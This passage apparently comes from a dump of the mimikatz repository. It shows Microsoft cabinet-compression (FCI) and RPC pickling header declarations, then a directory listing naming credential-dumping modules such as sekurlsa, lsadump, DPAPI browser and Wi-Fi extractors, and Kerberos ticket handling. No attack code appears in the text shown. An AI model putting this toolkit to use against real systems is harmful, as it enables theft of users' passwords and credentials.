* NOTE: We reserve bits for the TYPE, QUANTUM_LEVEL, and QUANTUM_MEM
* to provide room for future expansion. Since this value is stored
* in the CFDATA records in the cabinet file, we don't want to
* have to change the format for existing compression configurations
* if we add new ones in the future. This will allows us to read
* old cabinet files in the future.
*/
typedef unsigned short TCOMP; /* tcomp */
#define tcompMASK_TYPE 0x000F // Mask for compression type
#define tcompTYPE_NONE 0x0000 // No compression
#define tcompTYPE_MSZIP 0x0001 // MSZIP
#define tcompTYPE_QUANTUM 0x0002 // Quantum
#define tcompTYPE_LZX 0x0003 // LZX
#define tcompBAD 0x000F // Unspecified compression type
#define tcompMASK_LZX_WINDOW 0x1F00 // Mask for LZX Compression Memory
#define tcompLZX_WINDOW_LO 0x0F00 // Lowest LZX Memory (15)
#define tcompLZX_WINDOW_HI 0x1500 // Highest LZX Memory (21)
#define tcompSHIFT_LZX_WINDOW 8 // Amount to shift over to get int
#define tcompMASK_QUANTUM_LEVEL 0x00F0 // Mask for Quantum Compression Level
#define tcompQUANTUM_LEVEL_LO 0x0010 // Lowest Quantum Level (1)
#define tcompQUANTUM_LEVEL_HI 0x0070 // Highest Quantum Level (7)
#define tcompSHIFT_QUANTUM_LEVEL 4 // Amount to shift over to get int
#define tcompMASK_QUANTUM_MEM 0x1F00 // Mask for Quantum Compression Memory
#define tcompQUANTUM_MEM_LO 0x0A00 // Lowest Quantum Memory (10)
#define tcompQUANTUM_MEM_HI 0x1500 // Highest Quantum Memory (21)
#define tcompSHIFT_QUANTUM_MEM 8 // Amount to shift over to get int
#define tcompMASK_RESERVED 0xE000 // Reserved bits (high 3 bits)
#define CompressionTypeFromTCOMP(tc) \
((tc) & tcompMASK_TYPE)
#define CompressionLevelFromTCOMP(tc) \
(((tc) & tcompMASK_QUANTUM_LEVEL) >> tcompSHIFT_QUANTUM_LEVEL)
#define CompressionMemoryFromTCOMP(tc) \
(((tc) & tcompMASK_QUANTUM_MEM) >> tcompSHIFT_QUANTUM_MEM)
#define TCOMPfromTypeLevelMemory(t,l,m) \
(((m) << tcompSHIFT_QUANTUM_MEM ) | \
((l) << tcompSHIFT_QUANTUM_LEVEL) | \
( t ))
#define LZXCompressionWindowFromTCOMP(tc) \
(((tc) & tcompMASK_LZX_WINDOW) >> tcompSHIFT_LZX_WINDOW)
#define TCOMPfromLZXWindow(w) \
(((w) << tcompSHIFT_LZX_WINDOW ) | \
( tcompTYPE_LZX ))
//** Revert to default structure packing
#ifndef _WIN64
#include <poppack.h>
#endif
#ifdef __cplusplus
}
#endif /* __cplusplus */
#endif // !INCLUDED_TYPES_FCI_FDI
/*** fci_int.h - File Compression Interface definitions
*
* Copyright (C) Microsoft Corporation 1993-1994
* All Rights Reserved.
*
* Author:
* Chuck Strouss
*
* History:
* 09-Jan-1994 chuckst Contents moved to bfol.h, this file is a
* placeholder for the new 'higher-level' fci
* 14-Feb-1994 bens Cleaned up some comments.
* 09-Mar-1994 bens Added error codes (moved from buildcab.h);
* Added RESERVE control
* 17-Mar-1994 bens Specify structure packing explicitly
* 21-Mar-1994 bens Cleaned up names
* 22-Mar-1994 bens Documented error cods
* 29-Mar-1994 bens Add FCIFlushFolder, renamed FCIFlushCabinet
* 18-Apr-1994 bens Changed CDECL to DIAMONDAPI
* 18-May-1994 bens Add ccab.fFailOnIncompressible field for
* Chicago M6 hack.
* 11-Nov-2005 kinshu SAL annotation
*/
#ifndef INCLUDED_FCI
#define INCLUDED_FCI 1
#include <specstrings.h>
typedef __nullterminated char* LPSTR;
#include <basetsd.h>
#ifdef __cplusplus
extern "C" { /* Assume C declarations for C++ */
#endif /* __cplusplus */
//** Specify structure packing explicitly for clients of FCI
#ifndef _WIN64
#include <pshpack4.h>
#endif
/*** FCIERROR - Error codes returned in erf.erfOper field
*
*/
typedef enum {
FCIERR_NONE, // No error
FCIERR_OPEN_SRC, // Failure opening file to be stored in cabinet
// erf.erfTyp has C run-time *errno* value
FCIERR_READ_SRC, // Failure reading file to be stored in cabinet
// erf.erfTyp has C run-time *errno* value
FCIERR_ALLOC_FAIL, // Out of memory in FCI
FCIERR_TEMP_FILE, // Could not create a temporary file
// erf.erfTyp has C run-time *errno* value
FCIERR_BAD_COMPR_TYPE, // Unknown compression type
FCIERR_CAB_FILE, // Could not create cabinet file
// erf.erfTyp has C run-time *errno* value
FCIERR_USER_ABORT, // Client requested abort
FCIERR_MCI_FAIL, // Failure compressing data
FCIERR_CAB_FORMAT_LIMIT // Data-size or file-count exceeded CAB format limits
// i.e. Total-bytes (uncompressed) in a CAB-folder exceeded 0x7FFF8000 (~ 2GB)
// or, CAB size (compressed) exceeded 0x7FFFFFFF
// or, File-count in CAB exceeded 0xFFFF
} FCIERROR;
/*
* FAT file attribute flag used by FCI/FDI to indicate that
* the filename in the CAB is a UTF string
*/
#ifndef _A_NAME_IS_UTF
#define _A_NAME_IS_UTF 0x80
#endif
/*
* FAT file attribute flag used by FCI/FDI to indicate that
* the file should be executed after extraction
*/
#ifndef _A_EXEC
#define _A_EXEC 0x40
#endif
/*** HFCI - Handle to an FCI Context
*
*/
typedef void * HFCI;
/*** CCAB - Current Cabinet
*
* This structure is used for passing in the cabinet parameters to FCI,
* and is passed back on certain FCI callbacks to provide cabinet
* information to the client.
*/
typedef struct {
// longs first
ULONG cb; // size available for cabinet on this media
ULONG cbFolderThresh; // Thresshold for forcing a new Folder
// then ints
UINT cbReserveCFHeader; // Space to reserve in CFHEADER
UINT cbReserveCFFolder; // Space to reserve in CFFOLDER
UINT cbReserveCFData; // Space to reserve in CFDATA
int iCab; // sequential numbers for cabinets
int iDisk; // Disk number
#ifndef REMOVE_CHICAGO_M6_HACK
int fFailOnIncompressible; // TRUE => Fail if a block is incompressible
#endif
// then shorts
USHORT setID; // Cabinet set ID
// then chars
char szDisk[CB_MAX_DISK_NAME]; // current disk name
char szCab[CB_MAX_CABINET_NAME]; // current cabinet name
char szCabPath[CB_MAX_CAB_PATH]; // path for creating cabinet
} CCAB; /* ccab */
typedef CCAB *PCCAB; /* pccab */
/*** FNALLOC - Memory Allocation
* FNFREE - Memory Free
*
* These are modeled after the C run-time routines malloc() and free()
* (16-bit clients please note -- the size is a ULONG, so you may need
* to write a wrapper routine for halloc!). FDI expects error
* handling to be identical to these C run-time routines.
*
* As long as you faithfully copy the semantics of malloc() and free(),
* you can supply any functions you like!
*
* WARNING: You should never assume anything about the sequence of
* PFNALLOC and PFNFREE calls -- incremental releases of
* Diamond/FDI may have radically different numbers of
* PFNALLOC calls and allocation sizes!
*/
//** Memory functions for FCI
typedef void HUGE * (FAR DIAMONDAPI *PFNFCIALLOC)(ULONG cb); /* pfna */
#define FNFCIALLOC(fn) void HUGE * FAR DIAMONDAPI fn(ULONG cb)
typedef void (FAR DIAMONDAPI *PFNFCIFREE)(void HUGE *memory); /* pfnf */
#define FNFCIFREE(fn) void FAR DIAMONDAPI fn(void HUGE *memory)
//** File I/O functions for FCI
typedef INT_PTR (FAR DIAMONDAPI *PFNFCIOPEN) (__in LPSTR pszFile, int oflag, int pmode, int FAR *err, void FAR *pv);
typedef UINT (FAR DIAMONDAPI *PFNFCIREAD) (INT_PTR hf, void FAR *memory, UINT cb, int FAR *err, void FAR *pv);
typedef UINT (FAR DIAMONDAPI *PFNFCIWRITE)(INT_PTR hf, void FAR *memory, UINT cb, int FAR *err, void FAR *pv);
typedef int (FAR DIAMONDAPI *PFNFCICLOSE)(INT_PTR hf, int FAR *err, void FAR *pv);
typedef long (FAR DIAMONDAPI *PFNFCISEEK) (INT_PTR hf, long dist, int seektype, int FAR *err, void FAR *pv);
typedef int (FAR DIAMONDAPI *PFNFCIDELETE) (__in LPSTR pszFile, int FAR *err, void FAR *pv);
#define FNFCIOPEN(fn) INT_PTR FAR DIAMONDAPI fn(__in LPSTR pszFile, int oflag, int pmode, int FAR *err, void FAR *pv)
#define FNFCIREAD(fn) UINT FAR DIAMONDAPI fn(INT_PTR hf, void FAR *memory, UINT cb, int FAR *err, void FAR *pv)
#define FNFCIWRITE(fn) UINT FAR DIAMONDAPI fn(INT_PTR hf, void FAR *memory, UINT cb, int FAR *err, void FAR *pv)
#define FNFCICLOSE(fn) int FAR DIAMONDAPI fn(INT_PTR hf, int FAR *err, void FAR *pv)
#define FNFCISEEK(fn) long FAR DIAMONDAPI fn(INT_PTR hf, long dist, int seektype, int FAR *err, void FAR *pv)
#define FNFCIDELETE(fn) int FAR DIAMONDAPI fn(__in LPSTR pszFile, int FAR *err, void FAR *pv)
/*** FNFCIGETNEXTCABINET - Callback used to request new cabinet info
*
* Entry:
* pccab - Points to copy of old ccab structure to modify
* cbPrevCab - Estimate of size of previous cabinet
* pv - Has the caller's context pointer
*
* Exit-Success:
* returns TRUE;
*
* Exit-Failure:
* returns FALSE;
*/
typedef BOOL (DIAMONDAPI *PFNFCIGETNEXTCABINET)(PCCAB pccab,
ULONG cbPrevCab,
void FAR *pv); /* pfnfcignc */
#define FNFCIGETNEXTCABINET(fn) BOOL DIAMONDAPI fn(PCCAB pccab, \
ULONG cbPrevCab, \
void FAR *pv)
/*** FNFCIFILEPLACED - Notify FCI client that file was placed
*
* Entry:
* pccab - cabinet structure to fill in, with copy of previous one
* pszFile - name of file, from cabinet
* cbFile - length of file
* fContinuation - true if this is a later segment of a continued file
* pv - the context of the client
*
* Exit-Success:
* return value anything but -1
*
* Exit-Failure:
* return value -1 means to abort
*/
typedef int (DIAMONDAPI *PFNFCIFILEPLACED)(PCCAB pccab,
__in LPSTR pszFile,
long cbFile,
BOOL fContinuation,
void FAR *pv); /* pfnfcifp */
#define FNFCIFILEPLACED(fn) int DIAMONDAPI fn(PCCAB pccab, \
__in LPSTR pszFile, \
long cbFile, \
BOOL fContinuation, \
void FAR *pv)
/*** FNCDIGETOPENINFO - Open source file, get date/time/attribs
*
* Entry:
* pszName -- complete path to filename
* pdate -- location to return FAT-style date code
* ptime -- location to return FAT-style time code
* pattribs -- location to return FAT-style attributes
* pv -- client's context
*
* Exit-Success:
* Return value is file handle of open file to read
*
* Exit-Failure:
* Return value is -1
*/
typedef INT_PTR (DIAMONDAPI *PFNFCIGETOPENINFO)(__in LPSTR pszName,
USHORT *pdate,
USHORT *ptime,
USHORT *pattribs,
int FAR *err,
void FAR *pv); /* pfnfcigoi */
#define FNFCIGETOPENINFO(fn) INT_PTR DIAMONDAPI fn(__in LPSTR pszName, \
USHORT *pdate, \
USHORT *ptime, \
USHORT *pattribs, \
int FAR *err, \
void FAR *pv)
/*** FNFCISTATUS - Status/Cabinet Size callback
*
* Entry:
* typeStatus == statusFile if compressing a block into a folder
* cb1 = Size of compressed block
* cb2 = Size of uncompressed block
*
* typeStatus == statusFolder if adding a folder to a cabinet
* cb1 = Amount of folder copied to cabinet so far
* cb2 = Total size of folder
*
* typeStatus == statusCabinet if writing out a complete cabinet
* cb1 = Estimated cabinet size that was previously
* passed to fnfciGetNextCabinet().
* cb2 = Actual cabinet size
* NOTE: Return value is desired client size for cabinet
* file. FCI updates the maximum cabinet size
* remaining using this value. This allows a client
* to generate multiple cabinets per disk, and have
* FCI limit the size correctly -- the client can do
* cluster size rounding on the cabinet size!
* The client should either return cb2, or round cb2
* up to some larger value and return that.
* Exit-Success:
* Returns anything other than -1;
* NOTE: See statusCabinet for special return values!
*
* Exit-Failure:
* Returns -1 to signal that FCI should abort;
*/
#define statusFile 0 // Add File to Folder callback
#define statusFolder 1 // Add Folder to Cabinet callback
#define statusCabinet 2 // Write out a completed cabinet callback
typedef long (DIAMONDAPI *PFNFCISTATUS)(UINT typeStatus,
ULONG cb1,
ULONG cb2,
void FAR *pv); /* pfnfcis */
#define FNFCISTATUS(fn) long DIAMONDAPI fn(UINT typeStatus, \
ULONG cb1, \
ULONG cb2, \
void FAR *pv)
/*** FNFCIGETTEMPFILE - Callback, requests temporary file name
*
* Entry:
* pszTempName - Buffer to receive complete tempfile name
* cbTempName - Size of pszTempName buffer
*
* Exit-Success:
* return TRUE
*
* Exit-Failure:
* return FALSE; could not create tempfile, or buffer too small
*
* Note:
* It is conceivable that this function may return a filename
* that will already exist by the time it is opened. For this
* reason, the caller should make several attempts to create
* temporary files before giving up.
*/
typedef BOOL (DIAMONDAPI *PFNFCIGETTEMPFILE)(__out_bcount(cbTempName) char *pszTempName,
__in_range(>=, MAX_PATH) int cbTempName,
void FAR *pv); /* pfnfcigtf */
#define FNFCIGETTEMPFILE(fn) BOOL DIAMONDAPI fn(__out_bcount(cbTempName) char *pszTempName, \
__in_range(>=, MAX_PATH) int cbTempName, \
void FAR *pv)
/*** FCICreate -- create an FCI context (an open CAB, an open FOL)
*
* Entry:
* perf - structure where we return error codes
* pfnfcifp - callback to inform caller of eventual dest of files
* pfna - memory allocation function callback
* pfnf - memory free function callback
* pfnfcigtf - temp file name generator callback
* pccab - pointer to cabinet/disk name & size structure
*
* Notes:
* (1) The alloc/free callbacks must remain valid throughout
* the life of the context, up to and including the call to
* FCIDestroy.
* (2) The perf pointer is stored in the compression context (HCI),
* and any errors from subsequent FCI calls are stored in the
* erf that was passed in on *this* call.
*
* Exit-Success:
* Returns non-NULL handle to an FCI context.
*
* Exit-Failure:
* Returns NULL, perf filled in.
*/
HFCI DIAMONDAPI FCICreate(__in PERF perf,
__callback PFNFCIFILEPLACED pfnfcifp,
__callback PFNFCIALLOC pfna,
__callback PFNFCIFREE pfnf,
__callback PFNFCIOPEN pfnopen,
__callback PFNFCIREAD pfnread,
__callback PFNFCIWRITE pfnwrite,
__callback PFNFCICLOSE pfnclose,
__callback PFNFCISEEK pfnseek,
__callback PFNFCIDELETE pfndelete,
__callback PFNFCIGETTEMPFILE pfnfcigtf,
__in PCCAB pccab,
__in_opt void FAR *pv
);
/*** FCIAddFile - Add a disk file to a folder/cabinet
*
* Entry:
* hfci - FCI context handle
* pszSourceFile - Name of file to add to folder
* pszFileName - Name to store into folder/cabinet
* fExecute - Flag indicating execute on extract
* pfn_progress - Progress callback
* pfnfcignc - GetNextCabinet callback
* pfnfcis - Status callback
* pfnfcigoi - OpenInfo callback
* typeCompress - Type of compression to use for this file
* pv - pointer to caller's internal context
*
* Exit-Success:
* returns TRUE
*
* Exit-Failure:
* returns FALSE, error filled in
*
* This is the main function used to add file(s) to a cabinet
* or series of cabinets. If the current file causes the current
* folder/cabinet to overflow the disk image currently being built,
* the cabinet will be terminated, and a new cabinet/disk name will
* be prompted for via a callback. The pending folder will be trimmed
* of the data which has already been generated in the finished cabinet.
*/
BOOL DIAMONDAPI FCIAddFile(__in HFCI hfci,
__in LPSTR pszSourceFile,
__in LPSTR pszFileName,
BOOL fExecute,
__callback PFNFCIGETNEXTCABINET pfnfcignc,
__callback PFNFCISTATUS pfnfcis,
__callback PFNFCIGETOPENINFO pfnfcigoi,
TCOMP typeCompress
);
/*** FCIFlushCabinet - Complete the current cabinet under construction
*
* This will cause the current cabinet (assuming it is not empty) to
* be gathered together and written to disk.
*
* Entry:
* hfci - FCI context
* fGetNextCab - TRUE => Call GetNextCab to get continuation info;
* FALSE => Don't call GetNextCab unless this cabinet
* overflows.
* pfnfcignc - callback function to get continuation cabinets
* pfnfcis - callback function for progress reporting
* pv - caller's internal context for callbacks
*
* Exit-Success:
* return code TRUE
*
* Exit-Failure:
* return code FALSE, error structure filled in
*/
BOOL DIAMONDAPI FCIFlushCabinet(__in HFCI hfci,
BOOL fGetNextCab,
__callback PFNFCIGETNEXTCABINET pfnfcignc,
__callback PFNFCISTATUS pfnfcis
);
/*** FCIFlushFolder - Complete the current folder under construction
*
* This will force the termination of the current folder, which may or
* may not cause one or more cabinet files to be completed.
*
* Entry:
* hfci - FCI context
* GetNextCab - callback function to get continuation cabinets
* pfnProgress - callback function for progress reporting
* pv - caller's internal context for callbacks
*
* Exit-Success:
* return code TRUE
*
* Exit-Failure:
* return code FALSE, error structure filled in
*/
BOOL DIAMONDAPI FCIFlushFolder(__in HFCI hfci,
__callback PFNFCIGETNEXTCABINET pfnfcignc,
__callback PFNFCISTATUS pfnfcis
);
/*** FCIDestroy - Destroy a FCI context and delete temp files
*
* Entry:
* hfci - FCI context
*
* Exit-Success:
* return code TRUE
*
* Exit-Failure:
* return code FALSE, error structure filled in
*/
BOOL DIAMONDAPI FCIDestroy (__in HFCI hfci);
//** Revert to default structure packing
#ifndef _WIN64
#include <poppack.h>
#endif
#ifdef __cplusplus
}
#endif /* __cplusplus */
#endif // !INCLUDED_FCI
================================================
FILE: inc/Midles.h
================================================
/*++
Copyright (c) Microsoft Corporation. All rights reserved.
Module Name:
midles.h
Abstract:
This module contains definitions needed for encoding/decoding
support (serializing/deserializing a.k.a. pickling).
--*/
#ifndef __MIDLES_H__
#define __MIDLES_H__
#if _MSC_VER > 1000
#pragma once
#endif
#include <rpcndr.h>
#ifdef __cplusplus
extern "C" {
#endif
/*
* Pickling support
*/
typedef enum
{
MES_ENCODE,
MES_DECODE,
MES_ENCODE_NDR64
} MIDL_ES_CODE;
typedef enum
{
MES_INCREMENTAL_HANDLE,
MES_FIXED_BUFFER_HANDLE,
MES_DYNAMIC_BUFFER_HANDLE
} MIDL_ES_HANDLE_STYLE;
typedef void (__RPC_USER * MIDL_ES_ALLOC )
( IN OUT void * state,
OUT char ** pbuffer,
IN OUT unsigned int * psize );
typedef void (__RPC_USER * MIDL_ES_WRITE)
( IN OUT void * state,
IN char * buffer,
IN unsigned int size );
typedef void (__RPC_USER * MIDL_ES_READ)
( IN OUT void * state,
OUT char ** pbuffer,
IN OUT unsigned int * psize );
typedef handle_t MIDL_ES_HANDLE;
typedef struct _MIDL_TYPE_PICKLING_INFO
{
unsigned long Version;
unsigned long Flags;
UINT_PTR Reserved[3];
} MIDL_TYPE_PICKLING_INFO, * PMIDL_TYPE_PICKLING_INFO;
RPC_STATUS RPC_ENTRY
MesEncodeIncrementalHandleCreate(
void * UserState,
MIDL_ES_ALLOC AllocFn,
MIDL_ES_WRITE WriteFn,
handle_t * pHandle );
RPC_STATUS RPC_ENTRY
MesDecodeIncrementalHandleCreate(
void * UserState,
MIDL_ES_READ ReadFn,
handle_t * pHandle );
RPC_STATUS RPC_ENTRY
MesIncrementalHandleReset(
handle_t Handle,
void * UserState,
MIDL_ES_ALLOC AllocFn,
MIDL_ES_WRITE WriteFn,
MIDL_ES_READ ReadFn,
MIDL_ES_CODE Operation );
RPC_STATUS RPC_ENTRY
MesEncodeFixedBufferHandleCreate(
__out_bcount(BufferSize) char *pBuffer,
__in unsigned long BufferSize,
__out unsigned long *pEncodedSize,
__out handle_t *pHandle
);
RPC_STATUS RPC_ENTRY
MesEncodeDynBufferHandleCreate(
__deref_out_bcount(*pEncodedSize) char **pBuffer,
__out unsigned long *pEncodedSize,
__out handle_t *pHandle
);
RPC_STATUS RPC_ENTRY
MesDecodeBufferHandleCreate(
__bcount(BufferSize) char *pBuffer,
__out unsigned long BufferSize,
__out handle_t *pHandle
);
RPC_STATUS RPC_ENTRY
MesBufferHandleReset(
__in handle_t Handle,
__in unsigned long HandleStyle,
__in MIDL_ES_CODE Operation,
__deref_in_bcount_opt(BufferSize) char **pBuffer,
__in unsigned long BufferSize,
__out unsigned long *pEncodedSize
);
RPC_STATUS RPC_ENTRY
MesHandleFree( handle_t Handle );
RPC_STATUS RPC_ENTRY
MesInqProcEncodingId(
handle_t Handle,
PRPC_SYNTAX_IDENTIFIER pInterfaceId,
unsigned long * pProcNum );
size_t RPC_ENTRY
NdrMesSimpleTypeAlignSize ( handle_t );
void RPC_ENTRY
NdrMesSimpleTypeDecode(
handle_t Handle,
void * pObject,
short Size );
void RPC_ENTRY
NdrMesSimpleTypeEncode(
handle_t Handle,
const MIDL_STUB_DESC * pStubDesc,
const void * pObject,
short Size );
size_t RPC_ENTRY
NdrMesTypeAlignSize(
handle_t Handle,
const MIDL_STUB_DESC * pStubDesc,
PFORMAT_STRING pFormatString,
const void * pObject );
void RPC_ENTRY
NdrMesTypeEncode(
handle_t Handle,
const MIDL_STUB_DESC * pStubDesc,
PFORMAT_STRING pFormatString,
const void * pObject );
void RPC_ENTRY
NdrMesTypeDecode(
handle_t Handle,
const MIDL_STUB_DESC * pStubDesc,
PFORMAT_STRING pFormatString,
void * pObject );
size_t RPC_ENTRY
NdrMesTypeAlignSize2(
handle_t Handle,
const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
const MIDL_STUB_DESC * pStubDesc,
PFORMAT_STRING pFormatString,
const void * pObject );
void RPC_ENTRY
NdrMesTypeEncode2(
handle_t Handle,
const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
const MIDL_STUB_DESC * pStubDesc,
PFORMAT_STRING pFormatString,
const void * pObject );
void RPC_ENTRY
NdrMesTypeDecode2(
handle_t Handle,
const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
const MIDL_STUB_DESC * pStubDesc,
PFORMAT_STRING pFormatString,
void * pObject );
void RPC_ENTRY
NdrMesTypeFree2(
handle_t Handle,
const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
const MIDL_STUB_DESC * pStubDesc,
PFORMAT_STRING pFormatString,
void * pObject );
void RPC_VAR_ENTRY
NdrMesProcEncodeDecode(
handle_t Handle,
const MIDL_STUB_DESC * pStubDesc,
PFORMAT_STRING pFormatString,
... );
CLIENT_CALL_RETURN RPC_VAR_ENTRY
NdrMesProcEncodeDecode2(
handle_t Handle,
const MIDL_STUB_DESC * pStubDesc,
PFORMAT_STRING pFormatString,
...
);
// ndr64 entries.
size_t RPC_ENTRY
NdrMesTypeAlignSize3(
handle_t Handle,
const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
const MIDL_STUBLESS_PROXY_INFO* pProxyInfo,
const unsigned long * ArrTypeOffset[],
unsigned long nTypeIndex,
const void * pObject );
void RPC_ENTRY
NdrMesTypeEncode3(
handle_t Handle,
const MIDL_TYPE_PICKLING_INFO * pPicklingInfo,
const
gitextract_p7jg2v3b/ ├── README.md ├── appveyor.yml ├── inc/ │ ├── DbgHelp.h │ ├── DhcpSSdk.h │ ├── DsGetDC.h │ ├── Fci.h │ ├── Midles.h │ ├── NTSecPKG.h │ ├── PshPack8.h │ ├── SubAuth.h │ ├── WDBGEXTS.H │ ├── WinBer.h │ ├── WinDNS.h │ ├── Winldap.h │ ├── cardmod.h │ ├── fltUser.h │ ├── fltUserStructures.h │ ├── globals.h │ ├── msasn1.h │ ├── schannel.h │ ├── schnlsp.h │ └── wincred.h ├── kiwi_passwords.yar ├── lib/ │ ├── Win32/ │ │ ├── advapi32.hash.lib │ │ ├── bcrypt.lib │ │ ├── cryptdll.lib │ │ ├── fltlib.lib │ │ ├── hid.lib │ │ ├── msasn1.min.lib │ │ ├── ncrypt.lib │ │ ├── netapi32.min.lib │ │ ├── ntdll.min.lib │ │ ├── samlib.lib │ │ └── winsta.lib │ ├── arm64/ │ │ ├── advapi32.hash.lib │ │ ├── msasn1.min.lib │ │ ├── netapi32.min.lib │ │ └── ntdll.min.lib │ └── x64/ │ ├── advapi32.hash.lib │ ├── bcrypt.lib │ ├── cryptdll.lib │ ├── fltlib.lib │ ├── hid.lib │ ├── msasn1.min.lib │ ├── ncrypt.lib │ ├── netapi32.min.lib │ ├── ntdll.min.lib │ ├── samlib.lib │ └── winsta.lib ├── mimicom.idl ├── mimidrv/ │ ├── MAKEFILE │ ├── SOURCES │ ├── _build_.cmd │ ├── _clean_.cmd │ ├── _rebuild_.cmd │ ├── globals.h │ ├── ioctl.h │ ├── kkll_m_filters.c │ ├── kkll_m_filters.h │ ├── kkll_m_memory.c │ ├── kkll_m_memory.h │ ├── kkll_m_modules.c │ ├── kkll_m_modules.h │ ├── kkll_m_notify.c │ ├── kkll_m_notify.h │ ├── kkll_m_process.c │ ├── kkll_m_process.h │ ├── kkll_m_ssdt.c │ ├── kkll_m_ssdt.h │ ├── mimidrv.c │ ├── mimidrv.h │ ├── mimidrv.rc │ ├── mimidrv.vcxproj │ └── mimidrv.vcxproj.filters ├── mimikatz/ │ ├── mimikatz.c │ ├── mimikatz.h │ ├── mimikatz.rc │ ├── mimikatz.vcxproj │ ├── mimikatz.vcxproj.filters │ └── modules/ │ ├── crypto/ │ │ ├── kuhl_m_crypto_extractor.c │ │ ├── kuhl_m_crypto_extractor.h │ │ ├── kuhl_m_crypto_patch.c │ │ ├── kuhl_m_crypto_patch.h │ │ ├── kuhl_m_crypto_pki.c │ │ ├── kuhl_m_crypto_pki.h │ │ ├── kuhl_m_crypto_sc.c │ │ └── kuhl_m_crypto_sc.h │ ├── dpapi/ │ │ ├── kuhl_m_dpapi.c │ │ ├── kuhl_m_dpapi.h │ │ ├── kuhl_m_dpapi_oe.c │ │ ├── kuhl_m_dpapi_oe.h │ │ └── packages/ │ │ ├── kuhl_m_dpapi_chrome.c │ │ ├── kuhl_m_dpapi_chrome.h │ │ ├── kuhl_m_dpapi_citrix.c │ │ ├── kuhl_m_dpapi_citrix.h │ │ ├── kuhl_m_dpapi_cloudap.c │ │ ├── kuhl_m_dpapi_cloudap.h │ │ ├── kuhl_m_dpapi_creds.c │ │ ├── kuhl_m_dpapi_creds.h │ │ ├── kuhl_m_dpapi_keys.c │ │ ├── kuhl_m_dpapi_keys.h │ │ ├── kuhl_m_dpapi_lunahsm.c │ │ ├── kuhl_m_dpapi_lunahsm.h │ │ ├── kuhl_m_dpapi_powershell.c │ │ ├── kuhl_m_dpapi_powershell.h │ │ ├── kuhl_m_dpapi_rdg.c │ │ ├── kuhl_m_dpapi_rdg.h │ │ ├── kuhl_m_dpapi_sccm.c │ │ ├── kuhl_m_dpapi_sccm.h │ │ ├── kuhl_m_dpapi_ssh.c │ │ ├── kuhl_m_dpapi_ssh.h │ │ ├── kuhl_m_dpapi_wlan.c │ │ └── kuhl_m_dpapi_wlan.h │ ├── kerberos/ │ │ ├── kuhl_m_kerberos.c │ │ ├── kuhl_m_kerberos.h │ │ ├── kuhl_m_kerberos_ccache.c │ │ ├── kuhl_m_kerberos_ccache.h │ │ ├── kuhl_m_kerberos_claims.c │ │ ├── kuhl_m_kerberos_claims.h │ │ ├── kuhl_m_kerberos_pac.c │ │ ├── kuhl_m_kerberos_pac.h │ │ ├── kuhl_m_kerberos_ticket.c │ │ └── kuhl_m_kerberos_ticket.h │ ├── kuhl_m.h │ ├── kuhl_m_acr.c │ ├── kuhl_m_acr.h │ ├── kuhl_m_busylight.c │ ├── kuhl_m_busylight.h │ ├── kuhl_m_crypto.c │ ├── kuhl_m_crypto.h │ ├── kuhl_m_dpapi.c │ ├── kuhl_m_dpapi.h │ ├── kuhl_m_event.c │ ├── kuhl_m_event.h │ ├── kuhl_m_iis.c │ ├── kuhl_m_iis.h │ ├── kuhl_m_kernel.c │ ├── kuhl_m_kernel.h │ ├── kuhl_m_lsadump.c │ ├── kuhl_m_lsadump.h │ ├── kuhl_m_lsadump_remote.c │ ├── kuhl_m_lsadump_remote.h │ ├── kuhl_m_minesweeper.c │ ├── kuhl_m_minesweeper.h │ ├── kuhl_m_misc.c │ ├── kuhl_m_misc.h │ ├── kuhl_m_net.c │ ├── kuhl_m_net.h │ ├── kuhl_m_privilege.c │ ├── kuhl_m_privilege.h │ ├── kuhl_m_process.c │ ├── kuhl_m_process.h │ ├── kuhl_m_rdm.c │ ├── kuhl_m_rdm.h │ ├── kuhl_m_rpc.c │ ├── kuhl_m_rpc.h │ ├── kuhl_m_service.c │ ├── kuhl_m_service.h │ ├── kuhl_m_service_remote.c │ ├── kuhl_m_service_remote.h │ ├── kuhl_m_sid.c │ ├── kuhl_m_sid.h │ ├── kuhl_m_sr98.c │ ├── kuhl_m_sr98.h │ ├── kuhl_m_standard.c │ ├── kuhl_m_standard.h │ ├── kuhl_m_sysenvvalue.c │ ├── kuhl_m_sysenvvalue.h │ ├── kuhl_m_token.c │ ├── kuhl_m_token.h │ ├── kuhl_m_ts.c │ ├── kuhl_m_ts.h │ ├── kuhl_m_vault.c │ ├── kuhl_m_vault.h │ ├── lsadump/ │ │ ├── kuhl_m_lsadump_dc.c │ │ └── kuhl_m_lsadump_dc.h │ ├── misc/ │ │ ├── kuhl_m_misc_citrix.c │ │ ├── kuhl_m_misc_citrix.h │ │ ├── kuhl_m_misc_djoin.c │ │ └── kuhl_m_misc_djoin.h │ ├── ngc/ │ │ ├── kuhl_m_ngc.c │ │ └── kuhl_m_ngc.h │ └── sekurlsa/ │ ├── crypto/ │ │ ├── kuhl_m_sekurlsa_nt5.c │ │ ├── kuhl_m_sekurlsa_nt5.h │ │ ├── kuhl_m_sekurlsa_nt6.c │ │ └── kuhl_m_sekurlsa_nt6.h │ ├── globals_sekurlsa.h │ ├── kuhl_m_sekurlsa.c │ ├── kuhl_m_sekurlsa.h │ ├── kuhl_m_sekurlsa_sk.c │ ├── kuhl_m_sekurlsa_sk.h │ ├── kuhl_m_sekurlsa_utils.c │ ├── kuhl_m_sekurlsa_utils.h │ └── packages/ │ ├── kuhl_m_sekurlsa_cloudap.c │ ├── kuhl_m_sekurlsa_cloudap.h │ ├── kuhl_m_sekurlsa_credman.c │ ├── kuhl_m_sekurlsa_credman.h │ ├── kuhl_m_sekurlsa_dpapi.c │ ├── kuhl_m_sekurlsa_dpapi.h │ ├── kuhl_m_sekurlsa_kerberos.c │ ├── kuhl_m_sekurlsa_kerberos.h │ ├── kuhl_m_sekurlsa_livessp.c │ ├── kuhl_m_sekurlsa_livessp.h │ ├── kuhl_m_sekurlsa_msv1_0.c │ ├── kuhl_m_sekurlsa_msv1_0.h │ ├── kuhl_m_sekurlsa_ssp.c │ ├── kuhl_m_sekurlsa_ssp.h │ ├── kuhl_m_sekurlsa_tspkg.c │ ├── kuhl_m_sekurlsa_tspkg.h │ ├── kuhl_m_sekurlsa_wdigest.c │ └── kuhl_m_sekurlsa_wdigest.h ├── mimikatz.sln ├── mimilib/ │ 